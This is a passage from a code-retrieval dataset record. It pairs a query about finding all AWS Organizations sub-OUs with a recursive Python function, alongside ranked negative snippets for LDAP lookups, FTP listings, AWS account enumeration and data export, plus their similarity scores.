whether_in_range:\n continue\n\n print(f\"Pulling {test} data received on %s\"%search_date.date())\n toread = io.BytesIO()\n toread.write(att.payload)\n toread.seek(0) # reset the pointer\n newdf = pd.read_excel(toread) # now read to dataframe\n newdf = regulate_column_names(newdf, test)\n dfs[test] = dfs[test].append(newdf)\n time_flag = search_date\n return dfs, time_flag", "def test_Retrievefilesdict (self):\n\n\t\tknown_values = (\n\t\t\t\t(\n\t\t\t\t\t('TESTS/Test3/Telegram Desktop/File not in use.CBR','.file'),\n\t\t\t\t\t{0: {'name': 'File not in use.CBR', 'size': 0}},\n\t\t\t\t\t),\n\t\t\t\t(\t\n\t\t\t\t\t('TESTS/Test3/Emptyfoldertest/This is a folder', '.folder'),\n\t\t\t\t\t{0: {'name': 'This is a folder/Videofile.avi', 'size': 0},\n\t\t\t\t\t 1: {'name': 'This is a folder/Text Document.txt', 'size': 64},\n\t\t\t\t\t 2: {'name': 'This is a folder/Subfolder to analyze/Document in a sub-folder.txt', 'size': 410}},\n\t\t\t\t\t)\n\t\t\t\t\t)\n\t\tfor testvalue, goal in known_values:\n\t\t\tFullfilepath, Filetype = testvalue\n\t\t\titemdict = MD.Retrievefilesdict (Fullfilepath, Filetype)\n\t\t\tself.assertEqual (len (goal), len (itemdict))\n\t\t\tfor key in goal:\n\t\t\t\tself.assertEqual (itemdict[key],goal[key])", "def read_files_to_dict(dir_path):\n conversations = {}\n for filename in os.listdir(dir_path):\n if filename.endswith(\".txt\") and '-' not in filename:\n file_path = os.path.abspath(os.path.join(dir_path, filename))\n with open(file_path, 'r') as f:\n x = f.readlines()\n content_unicode = 
unicode(x[0], encoding='utf-8', errors='replace')\n if not filename in conversations:\n conversations[filename.split('.txt')[0]] = content_unicode\n return conversations", "def getftpfilename(ftpadress, remotedir, pattern):\n # ftp = FTP('ftp.cdc.noaa.gov')\n ftp = FTP(ftpadress)\n # print(ftp.getwelcome())\n # get direction info\n try:\n ftp.login()\n # ftp.cwd('/Datasets/ncep.reanalysis/pressure')\n ftp.cwd(remotedir)\n files = []\n ftp.dir(files.append) \n # # print(files)\n except ftplib.all_errors as e:\n print('FTP error:', e)\n # decode filename or dirname\n re_files = []\n for file in files:\n # print(file)\n if file.find(pattern) > 0:\n ss = file.split(' ')\n re_files.append(ss[-1]) \n return re_files", "def work(data):\n filepath = data['filepath']\n user = data['user']\n checksum_data = list(filter(lambda x: x['type'] == 'sha256', data['decrypted_checksums']))\n decrypted_checksum = checksum_data[0]['value']\n stable_id = data['accession_id']\n LOG.info(\"Mapping file with path %s and checksum %s to stable_id %s\", filepath, decrypted_checksum, stable_id)\n\n # Remove file from the inbox\n # TODO\n\n db.set_stable_id(filepath, user, decrypted_checksum, stable_id) # That will flag the entry as 'Ready'\n\n LOG.info(\"Stable ID %s mapped to %s\", stable_id, filepath)\n\n # Send message to mark file as completed on the CEGA side\n completed_data = data\n completed_data.pop(\"type\", None)\n LOG.info(f\"Reply message to files.completed: {completed_data}\")\n\n return (completed_data, False)" ]
[ "0.61010617", "0.5539876", "0.5464439", "0.5427242", "0.53528404", "0.5294358", "0.5280345", "0.52603656", "0.5202298", "0.52001935", "0.51878786", "0.5151942", "0.50964266", "0.5094671", "0.49855223", "0.49736506", "0.49720562", "0.4927294", "0.4900818", "0.48834655", "0.48789734", "0.48381448", "0.4825648", "0.48243362", "0.4813187", "0.4801121", "0.47902423", "0.47888604", "0.47769055", "0.47704992", "0.4764274", "0.47538555", "0.47512007", "0.47426608", "0.47209713", "0.4709962", "0.47016236", "0.46943554", "0.4680809", "0.46570373", "0.4647155", "0.46349573", "0.46256974", "0.46127698", "0.46118408", "0.46027315", "0.45995784", "0.45975992", "0.45904863", "0.4590346", "0.45867383", "0.45849395", "0.45693207", "0.45684013", "0.4567959", "0.45636138", "0.45479468", "0.45335206", "0.45306948", "0.45297244", "0.45253044", "0.4522797", "0.45172504", "0.45132196", "0.45056853", "0.4504179", "0.449935", "0.449526", "0.44950274", "0.44917256", "0.4488642", "0.44861913", "0.44831556", "0.44738677", "0.44726914", "0.4461898", "0.44592234", "0.44578677", "0.4457354", "0.44558573", "0.44538373", "0.4444849", "0.44443294", "0.44437236", "0.44372588", "0.44354483", "0.44346836", "0.4426496", "0.44232523", "0.4422638", "0.4412091", "0.44112638", "0.4408874", "0.44076487", "0.44055712", "0.4405485", "0.44048628", "0.44023547", "0.43956348", "0.43934658" ]
0.44602105
76
given an OU, find all the OUs within that OU...
def get_child_ous(logger, org_client, org_unit): logger.debug("Getting OUs for: %s", org_unit) result = [org_unit] # for this OU, get all the children... args = dict(ParentId=org_unit["Id"]) children = utils.generic_paginator(logger, org_client.list_organizational_units_for_parent, "OrganizationalUnits", **args) # update child paths and then call ourselves recursively to find all children for child in children: child["Path"] = "{}/{}".format(org_unit["Path"], child["Name"]).replace("//", "/") result.extend(get_child_ous(logger, org_client, child)) return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_accounts_for_ou(logger, options, org_client, path):\n logger.debug(\"Getting accounts for OU: %s\", path)\n org_unit = get_ou_from_path(logger, org_client, path)\n ous = []\n if options.no_recursive:\n ous.append(org_unit)\n else:\n ous.extend(get_child_ous(logger, org_client, org_unit))\n\n result = []\n for org_unit in ous:\n args = {\"ParentId\":org_unit[\"Id\"]}\n accounts = utils.generic_paginator(logger, org_client.list_accounts_for_parent,\n \"Accounts\", **args)\n for acc in accounts:\n acc[\"Path\"] = org_unit[\"Path\"]\n if 'Status' in acc:\n if acc['Status'] != 'SUSPENDED':\n result.append(acc)\n else:\n logger.info(\"found suspended account %s, ignoring it.\" % acc)\n return result", "def list_ou(self, _):\n cn_re = re_compile(\"{[^}]+}\")\n results = self.engine.query(self.engine.GPO_INFO_FILTER(), [\"cn\", \"displayName\"])\n gpos = {}\n for gpo in results:\n gpos[gpo[\"cn\"]] = gpo[\"displayName\"]\n\n results = self.engine.query(self.engine.OU_FILTER())\n for result in results:\n print(result[\"distinguishedName\"])\n if \"gPLink\" in result:\n guids = cn_re.findall(result[\"gPLink\"])\n if len(guids) > 0:\n print(\"[gPLink]\")\n print(\"* {}\".format(\"\\n* \".join([gpos[g] if g in gpos else g for g in guids])))", "def _get_ou_ids(self, org):\n\n # get root id\n root_id = self._get_root_id(org)\n\n # get OUs under the Org root\n ou_list_at_root_level = self._list_ou_for_parent(org, root_id)\n\n _ou_name_to_id_map = {}\n _all_ou_ids = []\n\n for ou_at_root_level in ou_list_at_root_level:\n # build list of all the OU IDs under Org root\n _all_ou_ids.append(ou_at_root_level.get('Id'))\n # build a list of ou id\n _ou_name_to_id_map.update(\n {ou_at_root_level.get('Name'): ou_at_root_level.get('Id')}\n )\n\n self.logger.info(\"Print OU Name to OU ID Map\")\n self.logger.info(_ou_name_to_id_map)\n\n return _all_ou_ids, _ou_name_to_id_map", "def list_all_organizations(ctx):\n pprint(ctx.obj.orgs.get().data)", "async def get_organizations(request: Request):\n redis = request.app.state.redis\n organizations_obj = orjson.loads(await redis.get_key(\"influxdb_organizations\"))\n return [org for org in organizations_obj]", "def createOuInLDAP(ldir, ou):\n\n dn = 'ou=%s,%s' % (ou, ldir.ldap_base_creation)\n attrs = {'objectClass': ['top', 'organizationalUnit'],\n 'ou': ou}\n ldir.insertLDAP(dn, attrs)", "def list_orgs(self):\n orgs = list(self.orgs.keys())\n orgs.sort()\n return orgs", "def test_retrieve_l_organizations(self):\n pass", "def organizations(self):\n return self.get('{}/orgs'.format(ApiVersion.A1.value))", "def getAllRooms(z, opts):\n params = {}\n dmerge(params, parse_param('@attrs=uid'))\n dmerge(params, parse_param('@types=resources'))\n #dmerge(params, parse_param('@limit=5'))\n response = z.request('SearchDirectoryRequest', params=params, opts=opts)\n names = [item['name'] for item in response['SearchDirectoryResponse']['calresource']]\n return names", "def get_ou_from_path(logger, org_client, path):\n logger.debug(\"Getting OU from path: %s\", path)\n\n current_ou = org_client.list_roots()[\"Roots\"][0][\"Id\"]\n if path == \"/\":\n return {\"Id\":current_ou, \"Path\":path}\n\n for dir_name in path.split(\"/\")[1:]:\n logger.debug(\"Getting OU from path: %s, looking for: %s\", path, dir_name)\n found = False\n args = dict(ParentId=current_ou)\n children = utils.generic_paginator(logger, org_client.list_organizational_units_for_parent,\n \"OrganizationalUnits\", **args)\n\n for org_unit in children:\n if org_unit[\"Name\"] == dir_name:\n current_ou = 
org_unit[\"Id\"]\n found = True\n break\n\n if not found:\n raise ValueError(\"OU path not found\")\n\n return {\"Id\":current_ou, \"Path\":path}", "def get_ldap_users(conn, searchfilter, attrs):\n\n base_dn = conn.server.info.other['DefaultNamingContext'][0]\n conn.search(search_base=base_dn, search_filter=searchfilter, attributes=attrs)\n return conn.entries", "def organizations(self):\n self.elements('organizations')", "def organizations_at_location(self, location):\n if location is None:\n queryset = self.filter(location=None)\n elif location.region is None:\n queryset = self.filter(Q(location=None) | Q(location=location))\n elif location.tik is None:\n queryset = self.filter(Q(location=None) | Q(location__id__in=[location.region_id, location.id]))\n else:\n queryset = self.filter(Q(location=None) | Q(location__id__in=[location.tik_id, location.region_id, location.id]))\n\n organization_ids = set(queryset.values_list('organization_id', flat=True))\n\n organizations = Organization.objects.filter(id__in=organization_ids).order_by('title')\n\n for representative in OrganizationRepresentative.objects.filter(organization__in=organization_ids):\n organization = (filter(lambda org: org.id==representative.organization_id, organizations) or [None])[0]\n if organization:\n organization.representative = True\n\n return organizations", "def get_orgs():\n \n url = \"https://api.github.com/user/orgs\"\n \n org_urls = []\n orgs = utils.get_json(url)\n \n for org in orgs:\n org_urls.append(org[\"url\"])\n \n return org_urls", "def all_organizations(\n self,\n page: int | None = None,\n per_page: int | None = None,\n include_totals: bool = True,\n from_param: str | None = None,\n take: int | None = None,\n ):\n\n params = {\n \"page\": page,\n \"per_page\": per_page,\n \"include_totals\": str(include_totals).lower(),\n \"from\": from_param,\n \"take\": take,\n }\n\n return self.client.get(self._url(), params=params)", "def test_getorgs(self):\n pass", "def getUsersByOrganisation(SID, organisation_id, start, max, orderby, asc):\n return call(\"getUsersByOrganisation\", SID, organisation_id, start, max, orderby, asc)", "def atlas_organizations():\n pass", "def get_owner_entities(self, username):\n\t\t#print('Quasar Utility Server getting owner entities for username{' + username + '}')\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_GET_OWNER_ENTITIES, username)", "def test_organizations_list(self):\n pass", "def organizations_owned(self):\n return sorted(set([team.org for team in self.teams if team.org.owners == team]),\n key=lambda o: o.title)", "def orca_list():\n val = []\n val.append('orca')\n val.append('orca-b3lyp')\n return val", "def offices_ldap():\n conn = Connection(\"ldap.laas.fr\", auto_bind=True)\n conn.search(\n \"dc=laas,dc=fr\",\n \"(laas-mainGroup=gepetto)\",\n attributes=[\"sn\", \"givenName\", \"roomNumber\", \"st\"],\n )\n offices = Offices()\n for entry in conn.entries:\n room, gn, sn, st = (\n str(entry.roomNumber),\n str(entry.givenName),\n str(entry.sn),\n str(entry.st),\n )\n if (\n st not in [\"JAMAIS\", \"NON-PERTINENT\"]\n and date(*(int(i) for i in reversed(st.split(\"/\")))) < date.today()\n ):\n continue # filter out alumni\n if room == \"[]\":\n continue # filter out the Sans-Bureaux-Fixes\n offices[room].add(Gepettist(sn, gn))\n return offices", "def test_get_all_for_organization(self):\n org = Organization.create(name='foo', program_id=self.program.uid)\n org.put()\n user = User.create(name='foo', email='foo@bar.com',\n owned_organizations=[org.uid])\n 
user.put()\n response = self.testapp.get(\n '/api/organizations/{}/users'.format(org.uid),\n headers=self.login_headers(user),\n )\n response_list = json.loads(response.body)\n self.assertEqual(len(response_list), 1)", "def create_ou(self, dn, name, description):\n attrs = {'objectclass': ['top', 'organizationalUnit'], 'ou': name, 'description': description}\n self.add_entry(dn, attrs)", "def computeMailboxOu(portal, title):\n\n catalog = portal.portal_catalog\n\n current = cleaned = toAscii(title).lower()\n i = 1\n existing = True\n while existing:\n existing = catalog(ou=current)\n if not existing:\n break\n current = '%s_%d' % (cleaned, i)\n i += 1\n dtool = getToolByName(portal, 'portal_directories', None)\n if dtool is not None: # not in unit tests\n ldir = getattr(dtool, 'local_addressbook_ldap', None)\n if ldir is not None:\n createOuInLDAP(ldir, current)\n return current", "def myorgs(request):\n context = RequestContext(request)\n \n user = request.user\n orgs = user.orgusers.get_query_set()\n \n context['orgs'] = orgs\n return render_to_response('myorgs.html', context)", "def list_by_owner(owner_name):\n # TODO: move to search\n owner = account.find(owner_name)\n return Resource.query.join(Resource.owner).filter(Account.name==owner.name)", "def list_all():\n\n members = ldapi.search(ld, cfg['ldap_users_base'], '(objectClass=member)')\n return dict([(member[0], member[1]) for member in members])", "def get_all_orgs():\r\n org_filter_set = set()\r\n if not has_configuration_set():\r\n return org_filter_set\r\n\r\n for value in settings.MICROSITE_CONFIGURATION.values():\r\n org_filter = value.get('course_org_filter')\r\n if org_filter:\r\n org_filter_set.add(org_filter)\r\n\r\n return org_filter_set", "def get_all_national_university():\n f_name = 'national_university_info.json'\n\n data_list = load_cache(f_name, data_type='list')\n if len(data_list) == 0:\n print('Request National University Info through Website...')\n for page in range(1, 17):\n data_list += get_national_university_page(page)\n save_cache(data_list, f_name)\n else:\n print('Get National University Info from Cache File...')\n\n nu_obj_list = [NationalUniversity(data_dict=data_dict) for data_dict in data_list]\n return nu_obj_list", "def get_all_users():", "def get_all_companies_and_people():", "def fetch_owner_accounts():\n resp = oauth.tapkey.get('Owners')\n owner_accounts = resp.json()\n return owner_accounts", "def allCountriesAndTowns():\n countryWoeids = [c.woeid for c in db.Country.select()]\n townWoeids = [t.woeid for t in db.Town.select()]\n woeidList = countryWoeids + townWoeids\n\n return woeidList", "async def scan_UTXOs(sochain_url, network, address):\n utxos = await sochain_api.get_unspent_txs(sochain_url, network, address)\n utxos = list(map(sochain_utxo_to_xchain_utxo, utxos))\n return utxos", "def ls():\n return dynamodb.ls(OrganizationModel)", "async def All_orgs():\n\n links_13 = []\n links_14 = []\n valid_url = \"/?archive/?gsoc/\\d+[0-9]/orgs/[a-zA-Z]+\"\n for year in range(2009, 2016):\n year_url = melange + \"/archive/gsoc/{}\".format(year)\n soup = await get_page(year_url)\n\n for url in soup.find_all('a'):\n if re.match(valid_url, url.get(\"href\")):\n if year <= 2013:\n links_13.append(join(melange, url.get(\"href\")[1:]))\n else:\n links_14.append(join(melange, url.get(\"href\")[1:]))\n return links_13, links_14", "def listOrganizations(self, name='', type=''):\n return self.get_json('/organization', {'name': name, 'type': type})", "def get_owned_databases(cursor: Cursor, owner: Owner) -> 
List[str]:\n try:\n role = pgsql.get_role(cursor, owner_name(owner))\n except KeyError:\n return []\n else:\n return pgsql.get_role_databases(cursor, role)", "def get_objects_owners(obj):\n type = obj.get_type()\n owners = []\n for user in obj.user_set.all():\n if type == Entities.TASK:\n relation = UserTasks.objects.get(user=user, task=obj)\n elif type == Entities.EVENT:\n relation = UserEvents.objects.get(user=user, event=obj)\n elif type == Entities.PLAN:\n relation = UserPlans.objects.get(user=user, plan=obj)\n else:\n raise TypeError\n owners.append(Owner(user.name, relation.access_level))\n\n return owners", "def get_org_admins(self, dataset: Dict) -> List[User]:\n organization_id = dataset[\"organization_id\"]\n orgadmins = list()\n organization = self.organizations[organization_id]\n if \"admin\" in organization:\n for userid in self.organizations[organization_id][\"admin\"]:\n user = self.users.get(userid)\n if user:\n orgadmins.append(user)\n return orgadmins", "def list(self) -> List[Organisation]:\n ...", "def create_test_ou(samdb, name):\n\n # Add some randomness to the test OU. Replication between the testenvs is\n # constantly happening in the background. Deletion of the last test's\n # objects can be slow to replicate out. So the OU created by a previous\n # testenv may still exist at the point that tests start on another testenv.\n rand = randint(1, 10000000)\n dn = ldb.Dn(samdb, \"OU=%s%d,%s\" % (name, rand, samdb.get_default_basedn()))\n samdb.add({\"dn\": dn, \"objectclass\": \"organizationalUnit\"})\n return dn", "def list_sub(location=''):\n if location != '':\n pathloc = os.path.join(os.getcwd(), location)\n else:\n pathloc = os.getcwd()\n\n print(pathloc)\n\n directory_contents = os.listdir(pathloc)\n sub_directories = []\n for item in directory_contents:\n # list directories\n if os.path.isdir(os.path.join(pathloc, item)):\n sub_directories.append(item)\n sub_directories.sort()\n return sub_directories", "def get_albums(entity_url: str) -> list:\n entity_url = entity_url.rstrip(\"/\")\n response = requests.get(entity_url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n albums = []\n for link in soup.find_all('a'):\n url = link.get('href')\n if url is not None and \"/album/\" in url:\n if url.startswith(\"http\"):\n albums.append(url)\n else:\n albums.append(f\"{entity_url}{url}\")\n return albums", "def get_groups(self, group_ou, group_class, domain):\n self.logger.debug(\"Retriving LDAP groups...\")\n try:\n groups_search_base = group_ou + ',' + domain\n self.logger.debug(\n \"Group search base: {0}\".format(groups_search_base)\n )\n groups = self.ldap_conn.search_s(\n groups_search_base,\n ldap.SCOPE_SUBTREE,\n \"(objectClass={0})\".format(group_class)\n )\n\n except ldap.LDAPError, e:\n self.logger.error(unicode(e.message).encode('utf-8'))\n raise PSQLAuthnzLDAPException(\n \"Failed to get groups from the specified OU.\"\n )\n except Exception as e:\n self.logger.error(unicode(e.message).encode('utf-8'))\n raise e\n\n self.logger.info(\n \"Retrieved {0} group(s) to synchronize...\".format(\n len(groups)\n )\n )\n\n for group in groups:\n self.logger.debug(\"Found group: {0}\".format(group[0]))\n\n return groups", "def get_albums_by_artist(albumtype, search_for, sort_on):\n return list(dmla.list_albums_by_artist(albumtype, search_for, sort_on))", "def test_retrieve_l_organization_locations(self):\n pass", "def find_own_objects(cs):\n own_objects = {}\n for con in cs:\n own_objects[con] = []\n for obj in con.extent:\n own_objects[con].append(obj)\n for 
sub_con in cs:\n if sub_con.extent < con.extent and\\\n obj in sub_con.extent:\n own_objects[con].pop()\n break\n return own_objects", "def search_ldap(l, filter, base, scope=ldap.SCOPE_SUBTREE, attributes=None, accountname=None, DEBUG=False):\r\n if '%s' in filter:\r\n query = filter % accountname\r\n else:\r\n query = filter\r\n if DEBUG:\r\n warning(\"searching for user '%s' in base: %s. retrieve attributes: %s, scope: %s\"%(accountname, base, attributes, scope))\r\n warning('Filter string: %s'%(query,))\r\n try:\r\n ldap_result_id = l.search(base, scope, query, attributes)\r\n if DEBUG:\r\n warning('ldap_result_id: %s'%ldap_result_id)\r\n result_set = llist()\r\n result_type, result_data = l.result(ldap_result_id, 0)\r\n if DEBUG:\r\n warning('len of result_data: %d'%len(result_data))\r\n while result_type == ldap.RES_SEARCH_ENTRY:\r\n result_data = result_data[0]\r\n #data = ( result_data[0] , { i:result_data[1][i] for i in result_data[1] } )\r\n user_data = ldict({i: result_data[1][i][0] if len(result_data[1][i])==1 else result_data[1][i] for i in result_data[1]})\r\n user_data['dn'] = result_data[0]\r\n if isinstance(user_data['dn'], list):\r\n user_data['dn'] = user_data['dn'][0]\r\n\r\n result_set.append(user_data)\r\n result_type, result_data = l.result(ldap_result_id, 0)\r\n if DEBUG:\r\n warning('len of result_data: %d'%len(result_data))\r\n\r\n return result_set\r\n\r\n except ldap.LDAPError, e:\r\n print e\r\n return None", "def organizations(self):\r\n return organizations.Organizations(self)", "def searchUsers(self,conds,_from,to,order_by,desc,admin_obj):\n self.__searchUsersCheckInput(conds,_from,to,order_by,desc,admin_obj)\n search_helper=user_main.getAttributeManager().runAttrSearchers(conds,admin_obj)\n return search_helper.getUserIDs(_from,to,order_by,desc)", "def owners(self):\n return self.find_users_by_rel('owner')", "def _parse_for_OU(self, event):\n rows = event.find_all(\"tr\")[:2]\n ous = []\n for row in rows:\n ou = row.find_all(\"td\", {\"class\": \"mktdesc\"})[0]\n handicap = row.find_all(\"td\", {\"class\": \"hdcp\"})[1]\n price = row.find_all(\"td\", {\"class\": \"odds\"})[2]\n ous.append(\" \".join((ou.text, handicap.text, price.text)))\n return tuple(ous)", "def test_retrieve_l_organization(self):\n pass", "def _get_userlist_by_userright(self, userright):\n params = {\n \"action\": \"query\",\n \"list\": \"allusers\",\n \"format\": \"json\",\n \"augroup\": userright,\n \"aulimit\": \"500\",\n }\n r = self.session.get(ENWIKI_API, params=params)\n data = r.json()\n return [u[\"name\"] for u in data[\"query\"][\"allusers\"]]", "def iter_units(status):\n for app_name, app in sorted(get_applications(status).items()):\n for unit_name, unit in sorted(app.get('units', {}).items()):\n yield unit_name, unit\n subordinates = unit.get('subordinates', ())\n for sub_name in sorted(subordinates):\n yield sub_name, subordinates[sub_name]", "def get_all_users(db):\n return list(db['user'].find())", "def get_university(doc = None, cursor = None):\n\tif cursor is None and doc is not None:\n\t\treturn doc['details']['university']\n\telif doc is None and cursor is not None:\n\t\tallunivs = list()\n\t\tfor thisdoc in cursor:\n\t\t\tallunivs.append(thisdoc['details']['university'])\n\t\treturn allcoms\n\telse:\n\t\tprint \"Supply any one argument only!\"", "def otuList():\n # Query all passengers\n results = session.query(Otu.otu_id,Otu.lowest_taxonomic_unit_found).all()\n\n # Create a dictionary from the row data and append to a list of all_passengers\n otus = []\n for aotu in 
results:\n # print(aotu.otu_id)\n otu_dict = {}\n # otu_dict[\"ID\"] = aotu.otu_id\n otu_dict[\"Lowest\"] = aotu.lowest_taxonomic_unit_found\n otus.append(otu_dict)\n return jsonify(otus)", "def search_ocio(rule: str):\n ocio_path = get_ocio_path()\n with open(ocio_path, mode='r') as f:\n config = f.read()\n list = re.findall(rule, config)\n\n return list", "def obtener_por_uo(unidad_organica_id):\n db = current.db\n q = (db.departamento.id > 0)\n q &= (db.departamento.unidad_organica_id == unidad_organica_id)\n return db(q).select(db.departamento.ALL,\n orderby=db.departamento.nombre)", "def organization_list(request):\n return [o.slug for o in Organization.objects.all()]", "def get_org_list():\r\n\r\n resp = requests.get(''.join([Kegg.BASE_URL, 'list/organism']))\r\n return resp.text", "def find_all_ORFs(dna):\n \n # YOUR IMPLEMENTATION HERE", "def organizations(self):\n return sorted(set([team.org for team in self.teams]), key=lambda o: o.title)", "def _createOrganizationsCollections(folder):\n collections = [\n {'id': 'all_orgs', 'tit': _('all_orgs'), 'subj': (u'search', ), 'query': [\n {'i': 'portal_type',\n 'o': 'plone.app.querystring.operation.selection.is',\n 'v': ['organization']}],\n 'cond': u\"\", 'bypass': [],\n 'flds': (u'select_row', u'org_pretty_link_with_additional_infos',\n u'SelectedInPlonegroupColumn', u'PloneGroupUsersGroupsColumn',\n u'review_state', u'CreationDate', u'actions'),\n 'sort': u'sortable_title', 'rev': False, 'count': False},\n ]\n _createDashboardCollections(folder, collections)", "def create_ou(self, ou_dn, description=None, name=None, sd=None):\n m = {\"dn\": ou_dn,\n \"objectClass\": \"organizationalUnit\"}\n\n if description:\n m[\"description\"] = description\n if name:\n m[\"name\"] = name\n\n if sd:\n m[\"nTSecurityDescriptor\"] = ndr_pack(sd)\n self.add(m)", "def users_organizations(user):\n if not user or not user.is_authenticated():\n return None\n else:\n return get_users_organizations(user)", "def online_users(room):\n threshold = datetime.now() - timedelta(seconds=10)\n authorizations = models.Authorization.gql(\"WHERE room = :room AND last_checked_in >= :threshold\", room=room, threshold=threshold).fetch(1000)\n return [x.user for x in authorizations]", "def _list_orgs(self, context):\r\n try:\r\n rtn = {'context': context,\r\n 'orgs': sorted(list(self._bbreader.cache[context].keys()))}\r\n except KeyError:\r\n raise RequestError('Context {} not found'.format(context))\r\n return rtn", "def get_members(organization):\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")", "def test_get_namespaces_from_accounts(self):\n pass", "def find_all_ORFs_both_strands_unit_tests():\n\n # YOUR IMPLEMENTATION HERE", "def index(owner):\n result = logic.resource.list_by_owner(owner)\n return jsonify(list(result))", "def _get_org_members(self):\n url = f\"{BASE_URL}/orgs/{ORG}/members\"\n return self.fetch_all_pages(url, flatten=True, query_params={\"per_page\": 100})", "def find_words_using_all_vowels():\n pass", "def find_user_groups(conn, ldap_domain, ldap_domain_ext, user_dn):\n try:\n search_base = \"dc={}, dc={}\".format(ldap_domain, ldap_domain_ext)\n query = \"(&(objectCategory=group)(member={}))\".format(user_dn)\n attributes = ['distinguishedName']\n\n conn.search(search_base, query, attributes=attributes)\n groups = conn.entries\n except Exception as e:\n raise Exception(\"No groups found :: {}\".format(e))\n return groups", "def get_all_items(unit) -> list:\n items = 
[]\n for item in unit.items:\n if item.multi_item:\n for subitem in item.subitems:\n items.append(subitem)\n else:\n items.append(item)\n return items", "def get_albums(username):\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM album WHERE username = '{0}'\".format(username))\n return cur.fetchall()", "def urn_coll(word, urns=[], after=5, before=5, limit=1000):\n if isinstance(urns[0], list): # urns assumed to be list of list with urn-serial as first element\n urns = [u[0] for u in urns]\n \n r = requests.post(\"https://api.nb.no/ngram/urncoll\", json={'word':word, 'urns':urns, \n 'after':after, 'before':before, 'limit':limit})\n return pd.DataFrame.from_dict(r.json(), orient='index').sort_values(by=0, ascending = False)", "def getInterestedUsers():", "def who_on_location(loc_npc, location):\r\n units = []\r\n # for y in [x for x in range(1, num) if loc_npc[x].location == location]:\r\n for y in [x for x in loc_npc if loc_npc[x].location == location]:\r\n units.append(y)\r\n return units", "def get_all_my_organizations(self, **kwargs):\n kwargs['_return_http_data_only'] = True\n if kwargs.get('callback'):\n return self.get_all_my_organizations_with_http_info(**kwargs)\n else:\n (data) = self.get_all_my_organizations_with_http_info(**kwargs)\n return data", "def woa_subset(llcrnrlon=2.5, urcrnrlon=357.5, llcrnrlat=-87.5, urcrnrlat=87.5,\n var='temperature', clim_type='monthly', resolution='1deg',\n levels=slice(0, 40)):\n\n uri = \"http://data.nodc.noaa.gov/thredds/dodsC/woa/WOA09/NetCDFdata\"\n fname = \"%s_%s_%s.nc\" % (var, clim_type, resolution)\n url = '%s/%s' % (uri, fname)\n nc = Dataset(url)\n\n v = dict(temperature='t', dissolved_oxygen='o', salinity='s',\n oxygen_saturation='O', apparent_oxygen_utilization='A',\n phosphate='p', silicate='p', nitrate='n')\n\n d = dict({'%s_an' % v[var]: 'OA Climatology',\n '%s_mn' % v[var]: 'Statistical Mean',\n '%s_dd' % v[var]: 'N. of Observations',\n '%s_se' % v[var]: 'Std Error of the Statistical Mean',\n '%s_sd' % v[var]: 'Std Deviation from Statistical Mean',\n '%s_oa' % v[var]: 'Statistical Mean minus OA Climatology',\n '%s_ma' % v[var]: 'Seasonal/Monthly minus Annual Climatology',\n '%s_gp' % v[var]: 'N. 
of Mean Values within Influence Radius'})\n\n depths = [0, 10, 20, 30, 50, 75, 100, 125, 150, 200, 250, 300, 400, 500,\n 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1750,\n 2000, 2500, 3000, 3500, 4000, 4500, 5000, 5500, 6000, 6500, 7000,\n 7500, 8000, 8500, 9000][levels]\n\n llcrnrlon, urcrnrlon = map(wrap_lon360, (llcrnrlon, urcrnrlon))\n lon = wrap_lon360(nc.variables.pop('lon')[:])\n lat = nc.variables.pop('lat')[:]\n depth = nc.variables.pop('depth')[:]\n times = nc.variables.pop('time')\n times = num2date(times[:], times.units, calendar='365_day')\n times = [time.strftime('%b') for time in times]\n\n if clim_type == 'annual':\n times = clim_type\n\n # Select data subset.\n maskx = np.logical_and(lon >= llcrnrlon, lon <= urcrnrlon)\n masky = np.logical_and(lat >= llcrnrlat, lat <= urcrnrlat)\n maskz = np.array([z in depths for z in depth])\n\n lon, lat, depth = lon[maskx], lat[masky], depth[maskz]\n\n start = '%s_' % v[var]\n variables = dict()\n for variable in nc.variables.keys():\n if variable.startswith(start):\n subset = nc.variables[variable][..., maskz, masky, maskx]\n data = Panel4D(subset, major_axis=lat, minor_axis=lon,\n labels=np.atleast_1d(times),\n items=np.atleast_1d(depth))\n variables.update({d[variable]: data})\n return variables", "def expand_otu_ids(otu_map, otus_to_expand, ignore_missing=False):\r\n result = []\r\n for o in otus_to_expand:\r\n otu_id = o.split()[0]\r\n try:\r\n result += otu_map[otu_id]\r\n except KeyError:\r\n if ignore_missing:\r\n continue\r\n else:\r\n raise KeyError(\"OTU id not in OTU map: %s\" % o.split()[0])\r\n return result", "def organizations_owned_ids(self):\n return list(set([team.org.id for team in self.teams if team.org.owners == team]))", "def get_organizations(self, language=None):\n return self.get_direct_related_page_extensions(\n Organization, OrganizationPluginModel, language=language\n )", "def exportOrgs ( c ) :\n assert str(type(c)) == \"<type '_mysql.connection'>\"\n xml = \"\"\n o = sqlQuery ( c, \"select * from Organizations;\" )\n for i in o:\n oL = sqlQuery ( c, \"select * from OrganizationLocations where orgID = '\"+i[0]+\"';\" )\n oER = sqlQuery ( c, \"select * from OrganizationExternalResources where orgID = '\"+i[0]+\"';\" )\n oTC = sqlQuery ( c, \"select * from OrganizationsToCrises where orgID = '\"+i[0]+\"';\" )\n pTO = sqlQuery ( c, \"select * from PeopleToOrganizations where orgID = '\"+i[0]+\"';\" )\n xml += openTagAtt ( \"Organization\", \"organizationIdent\", i[0])\n xml += openCloseTag ( \"Name\", i[1])\n xml += closeTagAtt ( \"Kind\", \"organizationKindIdent\", i[2])\n for j in oL :\n xml += openTag ( \"Location\" )\n xml += openCloseTag ( \"Locality\", j [ 1 ] )\n xml += openCloseTag ( \"Region\", j [ 2 ] )\n xml += openCloseTag ( \"Country\", j [ 3 ] )\n xml += closeTag ( \"Location\" )\n xml += openCloseTag (\"History\", i[3])\n xml += openTag ( \"ContactInfo\" )\n xml += openCloseTag (\"Telephone\", i[4])\n xml += openCloseTag (\"Fax\", i[5])\n xml += openCloseTag (\"Email\", i[6])\n xml += openTag (\"PostalAddress\")\n xml += openCloseTag (\"StreetAddress\", i[7])\n xml += openCloseTag ( \"Locality\", i[8])\n xml += openCloseTag ( \"Region\", i[9])\n xml += openCloseTag ( \"PostalCode\", i[10])\n xml += openCloseTag ( \"Country\", i[11])\n xml += 